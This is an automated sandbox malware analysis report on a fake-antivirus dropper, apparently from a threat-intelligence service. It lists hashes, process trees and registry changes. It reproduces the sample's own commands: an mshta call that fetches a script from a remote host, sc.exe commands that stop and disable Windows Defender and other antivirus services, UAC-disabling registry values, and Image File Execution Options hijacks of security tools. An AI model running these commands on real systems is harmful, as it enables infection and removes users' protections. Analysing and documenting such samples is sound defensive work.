Analysis
-
max time kernel
150s -
max time network
57s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
24/06/2024, 19:57
Static task
static1
Behavioral task
behavioral1
Sample
0a8ed0857614e31fc3f1591613098774_JaffaCakes118.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
0a8ed0857614e31fc3f1591613098774_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
0a8ed0857614e31fc3f1591613098774_JaffaCakes118.exe
-
Size
2.0MB
-
MD5
0a8ed0857614e31fc3f1591613098774
-
SHA1
bda66f3ab255fac2243eaec10d11a65b8bb1ef23
-
SHA256
745331f5d9ab3bf71f3b664646f47ebefd393e9ded6c429234dde7ccf0c89484
-
SHA512
b68cb1728faa22ecff305912f531fa4acde72627092296c3ff04b794d4b4b82e5e3887df60ea5f637560733511f2e8372114a961f7e224e7c638fd604d8cb75d
-
SSDEEP
49152:DyqYSSqIgP6GuJfipmF0hIdppCIsq6nemQ4YvAjJ1iFh3:DEqDiZfM+dpvsumUvAjriFh3
Malware Config
Extracted
http://galaint.updatesecstorage.info/?0=143&1=4&2=1&3=50&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=axhdtuowyv&14=1
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-lmpl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-lmpl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-lmpl.exe -
Disables taskbar notifications via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AlphaAV Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastUI.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashBug.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dpps2.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcnasvc.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mslaugh.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pdsetup.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svshost.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbcons.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bisp.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavprsrv.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\defscangui.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brasil.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winppr32.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mfweng3.02d30.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mghtml.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notstart.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\patch.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\realmon.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bargains.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsstat.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvtmd.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dvp95.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mfin32.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winactive.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibmasn.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luall.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pcfwallicon.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ppvstop.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tfak.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zatutor.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmgrdian.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autodown.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmdagent.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\divx.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldpromenu.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rrguard.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\supftrl.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\amon9x.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\inetlnfo.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netarmor.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netinfo.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reged.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_avpm.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxquar.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswUpdSv.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avwupd.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rscdwld.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntispywarXP2009.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tsadbot.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kerio-wrl-421-en-win.exe Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogin.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pspf.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svc.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_avp32.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zatutor.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsav95.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssys.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nprotect.exe\Debugger = "svchost.exe" Protector-lmpl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OAReg.exe Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sweep95.exe\Debugger = "svchost.exe" Protector-lmpl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcsysmon.exe\Debugger = "svchost.exe" Protector-lmpl.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation 0a8ed0857614e31fc3f1591613098774_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation 8yz7x9m2p02e35r.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation trew110gx7i4b68.exe -
Executes dropped EXE 3 IoCs
pid Process 2528 8yz7x9m2p02e35r.exe 4500 trew110gx7i4b68.exe 2568 Protector-lmpl.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-lmpl.exe" Protector-lmpl.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-lmpl.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc Protector-lmpl.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc Protector-lmpl.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc Protector-lmpl.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 432 sc.exe 4972 sc.exe 2744 sc.exe 1336 sc.exe 2812 sc.exe 4048 sc.exe 4732 sc.exe 4840 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 Protector-lmpl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" Protector-lmpl.exe -
Modifies registry class 27 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\ProgID\ trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\1.0\0\win32\ trew110gx7i4b68.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\1.0\FLAGS trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\1.0\FLAGS\ trew110gx7i4b68.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\1.0\0 trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\1.0\FLAGS\ = "0" trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\TypeLib\ = "{4899FE8B-18F3-562F-7971-0672289568D7}" trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\Version\ = "1.0" trew110gx7i4b68.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071} trew110gx7i4b68.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\InprocServer32 trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\1.0\ trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\1.0\ = "WMSClientNetManager 1.0 Type Library" trew110gx7i4b68.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\TypeLib trew110gx7i4b68.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\Version trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\Version\ trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\InprocServer32\ = "C:\\Windows\\SysWOW64\\scrrun.dll" trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\ProgID\ = "Scripting.FileSystemObject" trew110gx7i4b68.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\1.0 trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\ trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\ = "Inabwan.Qawaq Object" trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\1.0\0\ trew110gx7i4b68.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\1.0\0\win32 trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\InprocServer32\ trew110gx7i4b68.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\ProgID trew110gx7i4b68.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7} trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4899FE8B-18F3-562F-7971-0672289568D7}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\WMNetMgr.dll" trew110gx7i4b68.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A71E47E-9A70-498B-C9B7-E7D1EA5AA071}\TypeLib\ trew110gx7i4b68.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4500 trew110gx7i4b68.exe Token: SeShutdownPrivilege 4500 trew110gx7i4b68.exe Token: SeDebugPrivilege 2568 Protector-lmpl.exe Token: SeShutdownPrivilege 2568 Protector-lmpl.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4500 trew110gx7i4b68.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe 2568 Protector-lmpl.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 4876 wrote to memory of 2528 4876 0a8ed0857614e31fc3f1591613098774_JaffaCakes118.exe 81 PID 4876 wrote to memory of 2528 4876 0a8ed0857614e31fc3f1591613098774_JaffaCakes118.exe 81 PID 4876 wrote to memory of 2528 4876 0a8ed0857614e31fc3f1591613098774_JaffaCakes118.exe 81 PID 2528 wrote to memory of 4500 2528 8yz7x9m2p02e35r.exe 82 PID 2528 wrote to memory of 4500 2528 8yz7x9m2p02e35r.exe 82 PID 2528 wrote to memory of 4500 2528 8yz7x9m2p02e35r.exe 82 PID 4500 wrote to memory of 2568 4500 trew110gx7i4b68.exe 83 PID 4500 wrote to memory of 2568 4500 trew110gx7i4b68.exe 83 PID 4500 wrote to memory of 2568 4500 trew110gx7i4b68.exe 83 PID 4500 wrote to memory of 4884 4500 trew110gx7i4b68.exe 84 PID 4500 wrote to memory of 4884 4500 trew110gx7i4b68.exe 84 PID 4500 wrote to memory of 4884 4500 trew110gx7i4b68.exe 84 PID 2568 wrote to memory of 208 2568 Protector-lmpl.exe 86 PID 2568 wrote to memory of 208 2568 Protector-lmpl.exe 86 PID 2568 wrote to memory of 208 2568 Protector-lmpl.exe 86 PID 2568 wrote to memory of 4048 2568 Protector-lmpl.exe 88 PID 2568 wrote to memory of 4048 2568 Protector-lmpl.exe 88 PID 2568 wrote to memory of 4048 2568 Protector-lmpl.exe 88 PID 2568 wrote to memory of 4732 2568 Protector-lmpl.exe 89 PID 2568 wrote to memory of 4732 2568 Protector-lmpl.exe 89 PID 2568 wrote to memory of 4732 2568 Protector-lmpl.exe 89 PID 2568 wrote to memory of 4840 2568 Protector-lmpl.exe 90 PID 2568 wrote to memory of 4840 2568 Protector-lmpl.exe 90 PID 2568 wrote to memory of 4840 2568 Protector-lmpl.exe 90 PID 2568 wrote to memory of 432 2568 Protector-lmpl.exe 91 PID 2568 wrote to memory of 432 2568 Protector-lmpl.exe 91 PID 2568 wrote to memory of 432 2568 Protector-lmpl.exe 91 PID 2568 wrote to memory of 4972 2568 Protector-lmpl.exe 92 PID 2568 wrote to memory of 4972 2568 Protector-lmpl.exe 92 PID 2568 wrote to memory of 4972 2568 Protector-lmpl.exe 92 PID 2568 wrote to memory of 2744 2568 Protector-lmpl.exe 93 PID 2568 wrote to memory of 2744 2568 Protector-lmpl.exe 93 PID 2568 wrote to memory of 2744 2568 Protector-lmpl.exe 93 PID 2568 wrote to memory of 1336 2568 Protector-lmpl.exe 94 PID 2568 wrote to memory of 1336 2568 Protector-lmpl.exe 94 PID 2568 wrote to memory of 1336 2568 Protector-lmpl.exe 94 PID 2568 wrote to memory of 2812 2568 Protector-lmpl.exe 95 PID 2568 wrote to memory of 2812 2568 Protector-lmpl.exe 95 PID 2568 wrote to memory of 2812 2568 Protector-lmpl.exe 95 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Protector-lmpl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-lmpl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-lmpl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-lmpl.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0a8ed0857614e31fc3f1591613098774_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\0a8ed0857614e31fc3f1591613098774_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\8yz7x9m2p02e35r.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\8yz7x9m2p02e35r.exe" -e -p3w59261h16xc94p2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\trew110gx7i4b68.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\trew110gx7i4b68.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Users\Admin\AppData\Roaming\Protector-lmpl.exeC:\Users\Admin\AppData\Roaming\Protector-lmpl.exe4⤵
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2568 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.updatesecstorage.info/?0=143&1=4&2=1&3=50&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=axhdtuowyv&14=1"5⤵PID:208
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend5⤵
- Launches sc.exe
PID:4048
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled5⤵
- Launches sc.exe
PID:4732
-
-
C:\Windows\SysWOW64\sc.exesc stop msmpsvc5⤵
- Launches sc.exe
PID:4840
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled5⤵
- Launches sc.exe
PID:432
-
-
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled5⤵
- Launches sc.exe
PID:4972
-
-
C:\Windows\SysWOW64\sc.exesc stop AntiVirService5⤵
- Launches sc.exe
PID:2744
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled5⤵
- Launches sc.exe
PID:1336
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled5⤵
- Launches sc.exe
PID:2812
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\TREW11~1.EXE" >> NUL4⤵PID:4884
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD5d6eafe971e3f6bc582513666eb3d5583
SHA12ea4b554b1168a9afa1acb4fe4b99e6bb7eb0c20
SHA256a716bcbbcb79583d0c99597962438124a35c156855c9e899ae1082e5992fcb3c
